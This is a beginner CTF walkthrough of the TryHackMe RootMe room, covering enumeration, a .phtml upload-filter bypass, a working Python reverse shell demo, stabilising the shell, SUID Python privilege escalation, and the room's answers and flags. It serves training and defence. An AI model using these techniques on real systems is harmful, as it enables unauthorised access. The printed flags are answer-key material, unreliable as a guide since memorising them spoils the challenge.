We covered the basic steps of a penetration testing procedure using a beginner-friendly CTF challenge from TryHackMe named RootMe. The write-up provides a clear, step-by-step demonstration of solving the challenge, focusing on essential penetration testing concepts: common tools, systematic enumeration, and a logical approach to privilege escalation. The CTF is ideal for beginners who want to strengthen their foundational skills.
Web Hacking & Pentesting Study Notes
Objective
The challenge focuses on mastering foundational penetration testing skills, including:
- Reconnaissance: Identifying services and vulnerabilities.
- Exploitation: Gaining initial access via vulnerabilities.
- Privilege Escalation: Escalating user privileges to root.
Workflow Overview
- Reconnaissance:
  - Perform an nmap scan to identify open ports and running services.
  - Focus on ports 80 (HTTP) and 22 (SSH).
- Directory Brute-Forcing:
  - Use tools like ffuf or GoBuster to identify hidden directories.
  - Discovered directories include /uploads and /panel.
- Exploitation:
  - Exploit the upload functionality in /panel to upload a reverse shell.
  - Circumvent basic file extension filters using .phtml or similar.
- Privilege Escalation:
  - Identify binaries with the SUID bit set.
  - Exploit the SUID-enabled Python binary to escalate to root.
Information Gathering & Enumeration
Commands used in this stage:
nmap -sC -sV -oN nmap/rootme <MACHINE_IP>
gobuster dir -u http://<MACHINE_IP> -w <PATH_TO_WORDLIST>
Ports open on the machine:
22/ssh — OpenSSH 7.6p1
80/http — Apache httpd 2.4.29
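The room's first three questions are read straight off the nmap output. The script below is an added example (not part of the original notes) that parses nmap's normal (-oN) format, the file the nmap/rootme argument produces, and extracts the open ports, the service on each, and the Apache version. The NMAP_OUTPUT text is constructed to resemble a scan of this box with the two services listed above; the 10.10.10.10 address is a placeholder, and the filtered port is there only to show that non-open lines are ignored.

```python
"""Parse nmap -oN output to answer the enumeration questions for RootMe.

Added example; NMAP_OUTPUT is constructed and the address is a placeholder.
"""
import re

# Constructed sample of what `nmap -sC -sV -oN nmap/rootme <MACHINE_IP>` writes.
NMAP_OUTPUT = """\
# Nmap 7.80 scan initiated as: nmap -sC -sV -oN nmap/rootme 10.10.10.10
Nmap scan report for 10.10.10.10
Host is up (0.050s latency).
Not shown: 997 closed ports
PORT    STATE    SERVICE VERSION
22/tcp  open     ssh     OpenSSH 7.6p1 (protocol 2.0)
23/tcp  filtered telnet
80/tcp  open     http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
# Nmap done -- 1 IP address (1 host up) scanned in 12.34 seconds
"""

# One service line: "<port>/<proto>  <state>  <service>  <version...>"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)


def parse_open_ports(text):
    """Return {port: {"proto", "service", "version"}} for every line whose state is 'open'."""
    ports = {}
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group("state") == "open":
            ports[int(m.group("port"))] = {
                "proto": m.group("proto"),
                "service": m.group("service"),
                "version": m.group("version").strip(),
            }
    return ports


def apache_version(ports):
    """Pull the numeric Apache httpd version out of the version column, or None."""
    for info in ports.values():
        m = re.search(r"Apache httpd (\d+(?:\.\d+)+)", info["version"])
        if m:
            return m.group(1)
    return None


def room_answers(text):
    """The three facts the room asks for, derived from the scan text."""
    ports = parse_open_ports(text)
    return {
        "open_ports": len(ports),
        "apache_version": apache_version(ports),
        "port_22_service": ports.get(22, {}).get("service"),
    }


if __name__ == "__main__":
    for port, info in sorted(parse_open_ports(NMAP_OUTPUT).items()):
        print(f"{port}/{info['proto']}  {info['service']}  {info['version']}")
    print(room_answers(NMAP_OUTPUT))
```

Pointing room_answers at the real nmap/rootme file (open it and pass its contents) gives the same three answers for the live box.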
/panel/ was found by the directory brute-force and exposes a file upload form. Upload a PHP reverse shell with your attacker IP and port set in it, start your listener, then request the uploaded file under /uploads/ to get the first shell session.
Bypassing Upload Filters By Changing Extension
If the previous upload was rejected, the panel is filtering on the extension only. Rename the reverse shell from .php to .phtml and try again: the filter does not block .phtml, but Apache's default PHP configuration still hands .phtml files to the PHP module, so the payload executes when it is requested from /uploads/.
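To make the bypass concrete, here is an added example (not code from the RootMe room, whose panel source is not shown in the notes) modelling two upload checks in Python: a blocklist of the kind the panel evidently uses, which rejects only .php, and an allowlist a defender would use instead. The set of PHP-executable extensions comes from the Debian/Ubuntu php module config (FilesMatch ".+\.ph(ar|p|tml)$"); the file names are constructed.

```python
"""Blocklist vs allowlist upload checks, and which names Apache would execute.

Added example. The blocklist models the behaviour the .phtml rename exploits;
the allowlist shows the check that closes it. File names are constructed.
"""
import os

# Extensions the stock Debian/Ubuntu Apache PHP config maps to the PHP handler:
#   <FilesMatch ".+\.ph(ar|p|tml)$">  (assumed default, not read from the target)
PHP_EXECUTABLE_EXTS = {".php", ".phar", ".phtml"}
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif"}


def blocklist_check(filename):
    """Weak check: only the literal '.php' extension is refused.
    '.phtml', '.phar' and 'shell.php.jpg' all slip through."""
    return os.path.splitext(filename)[1].lower() != ".php"


def allowlist_check(filename):
    """Hardened check: exactly one extension, lower-cased, and it must be an image type.
    Any PHP-executable extension and any multi-dot name is refused outright."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False
    ext = "." + parts[1]
    if ext in PHP_EXECUTABLE_EXTS:
        return False
    return ext in IMAGE_EXTS


def would_execute(filename):
    """Would Apache run this file as PHP if it lands in a web-served directory?"""
    return os.path.splitext(filename)[1].lower() in PHP_EXECUTABLE_EXTS


def evaluate(filenames):
    """Per file: does each check accept it, and would the server execute it."""
    return {
        name: {
            "blocklist_accepts": blocklist_check(name),
            "allowlist_accepts": allowlist_check(name),
            "executes_as_php": would_execute(name),
        }
        for name in filenames
    }


def bypasses(filenames):
    """Names the blocklist lets through that Apache would still execute: the real risk."""
    return [n for n in filenames if blocklist_check(n) and would_execute(n)]


if __name__ == "__main__":
    samples = ["shell.php", "shell.phtml", "shell.PHP", "shell.phar", "shell.php.jpg", "cat.jpg"]
    for name, verdict in evaluate(samples).items():
        print(f"{name:14} {verdict}")
    print("bypasses:", bypasses(samples))
```

The name check is only half of a fix: uploads should also be stored outside the web root or in a directory where script execution is disabled, under a server-generated name, so a filter mistake cannot turn into code execution.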
Exploitation
- Upload Reverse Shell:
  - Prepare a PHP reverse shell script.
  - Modify the script to include the attacker's IP and desired port.
  - Rename the file with a .phtml extension to bypass filtering.
  - Upload the file via /panel.
  - Trigger the shell by accessing the uploaded file in /uploads.
- Gaining Shell Access:
  - Set up a Netcat listener:
nc -lvnp <port>
  - Trigger the uploaded file to establish a reverse shell.
  - Stabilize the shell for better usability by spawning a PTY:
python -c 'import pty; pty.spawn("/bin/bash")'
  - For a fully interactive shell (tab completion, Ctrl-C that does not kill the session), press Ctrl-Z, run stty raw -echo; fg on the attacker side, then export TERM=xterm inside the shell.
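The steps above describe two ends of one connection: the listener on the attacker's machine and the payload on the target. The following added example (not the PHP reverse shell used in the room) runs both ends against each other on 127.0.0.1 so the mechanics can be seen offline. connect_back does what the PHP payload does: connect out to the attacker and start /bin/sh with its stdin, stdout and stderr pointed at the socket; listen plays the part of nc -lvnp. The function names, the port-0 trick for picking a free port, and the command list are all part of this example.

```python
"""A reverse shell, both ends, on localhost.

Added example, not the room's PHP payload. connect_back() is the target side,
listen() is the attacker side (the nc -lvnp role). The commands are constructed.
"""
import socket
import subprocess
import threading


def connect_back(host, port):
    """Target side: dial the listener and hand the socket to a shell as its stdio.

    Everything the listener sends becomes the shell's stdin and everything the
    shell writes goes straight back over the socket; that is the whole trick."""
    sock = socket.create_connection((host, port))
    proc = subprocess.Popen(["/bin/sh"], stdin=sock, stdout=sock, stderr=sock)
    proc.wait()
    sock.close()  # parent's copy; the child's copy closed when the shell exited
    return proc.returncode


def listen(server, commands, out):
    """Attacker side: accept one connection, type the commands, collect the output."""
    conn, _ = server.accept()
    with conn:
        for cmd in commands:
            conn.sendall((cmd + "\n").encode())
        conn.shutdown(socket.SHUT_WR)  # EOF on the shell's stdin, like Ctrl-D in nc
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    out.append(b"".join(chunks).decode(errors="replace"))


def demo(commands):
    """Start a listener on a free local port, fire the payload at it, return the output."""
    server = socket.socket()
    server.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    server.listen(1)
    port = server.getsockname()[1]
    out = []
    t = threading.Thread(target=listen, args=(server, commands, out))
    t.start()
    connect_back("127.0.0.1", port)
    t.join()
    server.close()
    return out[0]


if __name__ == "__main__":
    print(demo(["echo reverse-shell-ok", "id", "pwd"]))
```

Without a PTY the shell here is exactly as awkward as the first session on the box: no prompt, no job control, and a Ctrl-C would kill the client rather than the running command, which is why the stabilisation step follows.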
Privilege Escalation
- Find SUID Binaries:
  - Use the find command to locate binaries with the SUID bit set (2>/dev/null hides the permission errors from directories the current user cannot read):
find / -perm -4000 2>/dev/null
  - Notable discovery: /usr/bin/python has the SUID bit set, which a standard install never does.
- Exploit Python SUID:
  - Use the method from GTFOBins to execute Python as root:
python -c 'import os; os.system("/bin/sh")'
  - This works because the SUID bit makes the Python process run with effective UID 0 and the shell it spawns inherits that. On Ubuntu /bin/sh is dash, which keeps the elevated effective UID; if a target's /bin/sh is bash, spawn it with -p (as the GTFOBins entry does) or call os.setuid(0) first, because bash drops an effective UID that differs from the real one.
  - Verify root access with the id command, then navigate to /root and read the flag.
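The "which file is weird?" question is really a baseline comparison: every Linux box has a handful of SUID binaries, and the interesting one is the entry that should not be there. The added example below (not part of the room) reimplements find / -perm -4000 2>/dev/null in Python and diffs the result against a set of binaries that are normally SUID on an Ubuntu system. The BASELINE set is an illustrative assumption for this example, not a complete list; build_demo_tree is constructed and sets the SUID bit on ordinary files in a temporary directory (the bit is recorded but has no effect, since the files are not root-owned).

```python
"""Locate SUID files and flag the ones that do not belong.

Added example. find_suid() mirrors `find / -perm -4000 2>/dev/null`;
unusual() diffs the hits against BASELINE. The demo tree is constructed.
"""
import os
import shutil
import stat
import tempfile

# Binaries that are normally SUID on an Ubuntu install (illustrative assumption,
# not an exhaustive list); anything outside it deserves a second look.
BASELINE = {
    "passwd", "sudo", "su", "mount", "umount", "chsh", "chfn",
    "gpasswd", "newgrp", "pkexec", "fusermount",
}


def find_suid(root):
    """Return sorted paths of regular files under `root` with the SUID bit set.

    Unreadable directories are skipped silently, which is what 2>/dev/null does
    for the find command; symlinks are not followed."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unusual(paths, baseline=BASELINE):
    """The SUID files whose basename is not in the expected set."""
    return [p for p in paths if os.path.basename(p) not in baseline]


def build_demo_tree():
    """Constructed tree: one expected SUID file, one unexpected one, one plain file."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("passwd", 0o4755), ("python", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, mode)  # 0o4755 = rwsr-xr-x, the SUID bit set
    return root


def run_demo():
    """Build the tree, scan it, clean up; return (all SUID names, unusual names)."""
    root = build_demo_tree()
    try:
        hits = find_suid(root)
        return ([os.path.basename(h) for h in hits],
                [os.path.basename(p) for p in unusual(hits)])
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    found, odd = run_demo()
    print("SUID files:", found)
    print("unusual:   ", odd)
    # Against a real host: print(unusual(find_suid("/")))
```

Run against / on the box, unusual() returns /usr/bin/python among possibly a few distro-specific entries; those are the candidates to look up on GTFOBins.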
Post-Exploitation
- Answer Challenge Questions:
  - Record findings such as:
    - Number of open ports: 2
    - Apache version: 2.4.29
    - Service on port 22: SSH
  - Use the flag found in /root to complete the challenge.
Room Answers | RootMe TryHackMe
Scan the machine, how many ports are open?
2
What version of Apache is running?
2.4.29
What service is running on port 22?
ssh
What is the hidden directory?
/panel/
Find a form to upload and get a reverse shell, and find the flag.
user.txt
THM{y0u_g0t_a_sh3ll}
Search for files with SUID permission, which file is weird?
/usr/bin/python
Find a form to escalate your privileges.
root.txt
THM{pr1v1l3g3_3sc4l4t10n}
Check out the video below for detailed explanation.
RootMe TryHackMe Video Walkthrough